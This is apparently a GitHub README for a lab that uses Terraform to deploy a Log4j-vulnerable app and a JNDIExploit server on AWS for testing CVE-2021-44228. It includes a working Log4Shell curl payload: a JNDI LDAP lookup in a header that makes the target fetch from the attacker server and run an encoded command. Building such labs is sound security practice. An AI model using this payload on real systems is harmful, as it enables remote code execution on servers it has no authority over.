Skip to content

A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228

Notifications You must be signed in to change notification settings

mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

log4j-vulnerable-app-cve-2021-44228-terraform

A Terraform to deploy vulnerable app and a JNDIExploit to work with CVE-2021-44228

About Stack

This terraform creates two instances on a VPC in AWS Cloud.

You just need to export your AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY

One instance is JNDIExploit.

Second is a Vulnerable-App to log4j exploit

Please replace your SSH-Public-Key in terraform before apply

terraform init
terraform plan
terraform apply --auto-approve

Exploit

After deployment on aws you can exploit it with curl request, and verify file creation in /tmp on the vulnerable-app container.

curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

On the vulnerable app server run the following command to verify command execution, you should see pwned file

sudo docker exec -ti vulnerable-app ls /tmp

About

A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages